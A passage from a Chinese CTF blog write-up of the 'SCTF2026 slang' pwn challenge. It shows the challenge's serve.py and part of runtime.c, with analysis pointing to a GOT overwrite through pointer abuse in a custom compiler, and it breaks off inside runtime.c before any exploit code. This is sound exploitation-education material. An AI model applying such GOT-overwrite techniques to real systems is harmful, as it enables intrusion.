  <!DOCTYPE html>
  <html lang="zh-CN"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-LMV367JHNS"></script>
  <script data-pjax>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'G-LMV367JHNS');
  </script>

  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_ex15nbittbh';window.REIMU_CONFIG.clipboard_tips = {"success":{"zh-CN":"复制成功 (*^▽^*)"},"fail":{"zh-CN":"复制失败 (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = '本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'https://idcm-svg.github.io/HFTTC.github.io';window.REIMU_CONFIG.relative = '/HFTTC.github.io/';</script>
  <title>
    SCTF2026 slang | HFTTC&#39;s Blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_ex15nbittbh.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/HFTTC.github.io/css/loader.css">

    <meta name="description" content="这道题目的逻辑并不算难，一道新型编译器也算是拓展眼界了。wp 写得会比较长，实际上并没有那么难。 不过也有点难受，就是你要新认识一个编译器，并编写出相应的代码进行篡改攻击 emmmm…… 本质还是利用指针篡改 got 表    serve.py123456789101112131415161718192021222324252627282930313233343536373839404142434">
<meta property="og:type" content="article">
<meta property="og:title" content="SCTF2026 slang">
<meta property="og:url" content="https://idcm-svg.github.io/HFTTC.github.io/2026/06/19/SCTF2026%20slang/index.html">
<meta property="og:site_name" content="HFTTC&#39;s Blog">
<meta property="og:description" content="这道题目的逻辑并不算难，一道新型编译器也算是拓展眼界了。wp 写得会比较长，实际上并没有那么难。 不过也有点难受，就是你要新认识一个编译器，并编写出相应的代码进行篡改攻击 emmmm…… 本质还是利用指针篡改 got 表    serve.py123456789101112131415161718192021222324252627282930313233343536373839404142434">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-001.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-002.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-003.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-004.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-005.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-006.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-007.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-008.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-009.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-010.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-011.png">
<meta property="og:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-012.png">
<meta property="article:published_time" content="2026-06-19T13:35:22.000Z">
<meta property="article:modified_time" content="2026-06-19T14:35:55.219Z">
<meta property="article:author" content="HFTTC">
<meta property="article:tag" content="compiler">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="sctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://idcm-svg.github.io/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-001.png">
    <link rel="canonical" href="https://idcm-svg.github.io/HFTTC.github.io/2026/06/19/SCTF2026%20slang/">
      <meta name="keywords" content="南阳理工学院, 网络安全, 软件安全, 计软, CTF, Pwn, Binary">
    <link rel="alternate" href="/HFTTC.github.io/atom.xml" title="HFTTC's Blog" type="application/atom+xml">
    <link rel="shortcut icon" href="/HFTTC.github.io/images/favicon.ico">
  
<link rel="stylesheet" href="/HFTTC.github.io/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

  <script type="application/ld+json">{"@context":"https://schema.org","@type":"WebPage","name":"SCTF2026 slang | HFTTC's Blog","headline":"SCTF2026 slang","description":"心之所向，无问西东","url":"https://idcm-svg.github.io/HFTTC.github.io/2026/06/19/SCTF2026%20slang/","inLanguage":"zh-CN"}</script>
<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">首页</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/catalog">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">目录</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/notice">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">公告</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/friend">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">友链</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/archives">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">归档</span>
        </a>
        <a class="main-nav-link-wrap" href="/HFTTC.github.io/about">
            <div class="main-nav-icon icon rotate">
                &#xe62b;
            </div>
          <span class="main-nav-link">关于</span>
        </a>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/HFTTC.github.io/atom.xml" title="RSS 订阅" aria-label="RSS 订阅" target="_blank"></a>
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索" aria-label="搜索"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
    <picture></picture>
    <img  fetchpriority="high" src="/HFTTC.github.io/images/pwn/covers/sctf2026-slang.jpg" alt="SCTF2026 slang">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">SCTF2026 slang</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content"  class="sidebar-right" >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#serve-py"><span class="toc-number">1.</span> <span class="toc-text">serve.py</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#runtime-c"><span class="toc-number">2.</span> <span class="toc-text">runtime.c</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AF%B9%E4%BA%8E-runtime-c-%E7%9A%84%E6%80%9D%E8%80%83"><span class="toc-number">2.1.</span> <span class="toc-text">对于 runtime.c 的思考</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E9%BB%91%E7%9B%92%E7%BC%96%E8%AF%91%E5%99%A8%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">探测黑盒编译器：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%A7%84%E5%AE%9A-main-%E5%87%BD%E6%95%B0%EF%BC%8C%E8%BF%94%E5%9B%9E-int-%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.1.</span> <span class="toc-text">规定 main 函数，返回 int 类型</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F"><span class="toc-number">3.2.</span> <span class="toc-text">添加局部变量</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E5%A4%9A%E4%B8%AA%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F"><span class="toc-number">3.3.</span> <span class="toc-text">验证多个局部变量</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%E4%BC%A0%E5%85%A5%E5%8F%82%E6%95%B0%EF%BC%9A"><span class="toc-number">3.4.</span> <span class="toc-text">尝试传入参数：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B0%9D%E8%AF%95%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%B1%BB%E5%9E%8B%EF%BC%9A"><span class="toc-number">3.5.</span> <span class="toc-text">尝试字符串类型：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81-vec-%E7%B1%BB%E5%9E%8B%E4%BB%A5%E5%8F%8A-vec-new%EF%BC%9A"><span class="toc-number">3.6.</span> <span class="toc-text">验证 vec 类型以及 vec_new：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81-scribble%EF%BC%9A"><span class="toc-number">3.7.</span> <span class="toc-text">验证 scribble：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81-if"><span class="toc-number">3.8.</span> <span class="toc-text">验证 if</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E9%BB%91%E7%9B%92%E7%BC%96%E8%AF%91%E5%99%A8%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">3.9.</span> <span class="toc-text">黑盒编译器总结：</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#EXP-%E7%BC%96%E5%86%99%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">EXP 编写：</span></a></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/HFTTC.github.io/avatar/head.jpg" data-sizes="auto" alt="HFTTC" class="lazyload">
  <div class="sidebar-author-name">HFTTC</div>
  <div class="sidebar-description">心之所向，无问西东</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">137</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/IDCM-svg itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/catalog" aria-label="目录"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">目录</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/notice" aria-label="公告"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">公告</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/friend" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/HFTTC.github.io/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon rotate">
              &#xe62b;
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-SCTF2026 slang" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2026-06-19T13:35:22.000Z" itemprop="datePublished">2026-06-19</time>
    <time style="display: none;" id="post-update-time">2026-06-19</time>
  </span>
    <span class="article-date-link icon-calendar-plus" data-aos="zoom-in">
      <time datetime="2026-06-19T14:35:55.219Z" itemprop="dateModified">2026-06-19</time>
    </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <p>这道题目的逻辑并不算难，一道新型编译器也算是拓展眼界了。wp 写得会比较长，实际上并没有那么难。</p>
<p>不过也有点难受，就是你要新认识一个编译器，并编写出相应的代码进行篡改攻击 emmmm……</p>
<p>本质还是利用指针篡改 got 表</p>
<hr>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/HFTTC.github.io/images/pwn/imported/sctf2026-slang/img-001.png"></p>
<h4 id="serve-py"><a href="#serve-py" class="headerlink" title="serve.py"></a>serve.py</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">BUILD_DIR = <span class="string">&quot;/tmp/slang-build&quot;</span></span><br><span class="line">SHELL_CWD = <span class="string">&quot;/home/ctf&quot;</span></span><br><span class="line">COMPILER = <span class="string">&quot;/home/ctf/slang&quot;</span></span><br><span class="line">RUNTIME = <span class="string">&quot;/home/ctf/runtime.c&quot;</span></span><br><span class="line">MAX_SOURCE = <span class="number">8192</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">rnd</span>(<span class="params">n=<span class="number">12</span></span>):</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join(random.choice(string.ascii_letters) <span class="keyword">for</span> _ <span class="keyword">in</span> <span class="built_in">range</span>(n))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">build</span>(<span class="params">src</span>):</span><br><span class="line">    os.makedirs(BUILD_DIR, exist_ok=<span class="literal">True</span>)</span><br><span class="line">    src_path = os.path.join(BUILD_DIR, rnd() + <span class="string">&quot;.slang&quot;</span>)</span><br><span class="line">    c_path = os.path.join(BUILD_DIR, rnd() + <span class="string">&quot;.c&quot;</span>)</span><br><span class="line">    exe_path = os.path.join(BUILD_DIR, rnd())</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(src_path, <span class="string">&quot;w&quot;</span>, encoding=<span class="string">&quot;utf-8&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        f.write(src)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(os.devnull, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> devnull:</span><br><span class="line">        <span class="keyword">if</span> subprocess.run([COMPILER, src_path, c_path], stdin=devnull).returncode != <span class="number">0</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        cmd = [<span class="string">&quot;gcc&quot;</span>, <span class="string">&quot;-O0&quot;</span>, <span class="string">&quot;-Wall&quot;</span>, <span class="string">&quot;-Wextra&quot;</span>, <span class="string">&quot;-no-pie&quot;</span>, <span class="string">&quot;-o&quot;</span>, exe_path, c_path, RUNTIME]</span><br><span class="line">        <span class="keyword">if</span> subprocess.run(cmd, stdin=devnull).returncode != <span class="number">0</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">    <span class="keyword">return</span> exe_path</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">read_source</span>():</span><br><span class="line">    lines = []</span><br><span class="line">    cur = <span class="built_in">bytearray</span>()</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        ch = os.read(<span class="number">0</span>, <span class="number">1</span>)</span><br><span class="line">        <span class="keyword">if</span> ch == <span class="string">b&quot;&quot;</span>:</span><br><span class="line">            <span class="keyword">raise</span> EOFError</span><br><span class="line">        <span class="keyword">if</span> ch == <span class="string">b&quot;\n&quot;</span>:</span><br><span class="line">            line = cur.decode(<span class="string">&quot;utf-8&quot;</span>, errors=<span class="string">&quot;strict&quot;</span>)</span><br><span class="line">            cur.clear()</span><br><span class="line">            <span class="keyword">if</span> line == <span class="string">&quot;END_OF_SOURCE&quot;</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="string">&quot;\n&quot;</span>.join(lines)</span><br><span class="line">            lines.append(line)</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">sum</span>(<span class="built_in">len</span>(x.encode()) + <span class="number">1</span> <span class="keyword">for</span> x <span class="keyword">in</span> lines) &gt; MAX_SOURCE:</span><br><span class="line">                <span class="keyword">raise</span> ValueError(<span class="string">&quot;source too large&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            cur += ch</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Give me slang source. End with END_OF_SOURCE.&quot;</span>, flush=<span class="literal">True</span>)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        src = read_source()</span><br><span class="line">    <span class="keyword">except</span> (EOFError, UnicodeDecodeError):</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line">    <span class="keyword">except</span> ValueError <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="built_in">str</span>(e), flush=<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line">    exe = build(src)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> exe:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;compilation failed&quot;</span>, flush=<span class="literal">True</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1</span></span><br><span class="line">    os.chdir(SHELL_CWD)</span><br><span class="line">    os.chmod(exe, <span class="number">0o700</span>)</span><br><span class="line">    os.execv(exe, [exe])</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">raise</span> SystemExit(main())</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>文件当中有 serve.py，先看一下 serve.py 的逻辑：</p>
<ul>
<li>main 函数当中先执行 read_source 读取源码，直到读取到 END_OF_SOURCE</li>
<li>之后执行 build 函数， subprocess.run  会执行编译命令，而编译器是<code>COMPILER = &quot;/home/ctf/slang&quot;</code></li>
</ul>
<p>两个编译命令分别是</p>
<p><code>slang source.slang output.c</code></p>
<p><code>gcc -O0 -Wall -Wextra -no-pie -o exe output.c runtime.c</code></p>
<p>那么从这里可以得出一些基本结论：</p>
<ol>
<li>程序漏洞大概率出在编译器 slang 当中</li>
<li>gcc 执行的编译命令是 -no-pie，因此地址是固定的。</li>
</ol>
<h4 id="runtime-c"><a href="#runtime-c" class="headerlink" title="runtime.c"></a>runtime.c</h4><p>runtime.c 是给 slang 生成出来的 C 程序链接用的运行时库，所以它决定了 DSL 程序最终能做什么，因此这个程序大概率并不会有漏洞，但是漏洞利用一定和 runtime.c 里面的函数行为有关：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">struct</span> <span class="title">vec_t</span> &#123;</span></span><br><span class="line">    <span class="type">int64_t</span> *data;</span><br><span class="line">    <span class="type">int64_t</span> size;</span><br><span class="line">&#125; <span class="type">vec_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">extern</span> <span class="type">int64_t</span> <span class="title function_">user_main</span><span class="params">(<span class="type">void</span>)</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">die</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *msg)</span> &#123;</span><br><span class="line">    <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">&quot;fatal: %s\n&quot;</span>, msg);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">init_io</span><span class="params">(<span class="type">void</span>)</span> &#123;</span><br><span class="line">    setvbuf(<span class="built_in">stdin</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stdout</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">    setvbuf(<span class="built_in">stderr</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">vec_t</span> *<span class="title function_">rt_vec_new</span><span class="params">(<span class="type">int64_t</span> n)</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (n &lt; <span class="number">0</span> || n &gt; <span class="number">64</span>) &#123;</span><br><span class="line">        die(<span class="string">&quot;bad vector size&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">vec_t</span> *v = (<span class="type">vec_t</span> *)<span class="built_in">malloc</span>(<span class="keyword">sizeof</span>(<span class="type">vec_t</span>));</span><br><span class="line">    <span class="keyword">if</span> (!v) &#123;</span><br><span class="line">        die(<span class="string">&quot;malloc vec&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    v-&gt;data = (<span class="type">int64_t</span> 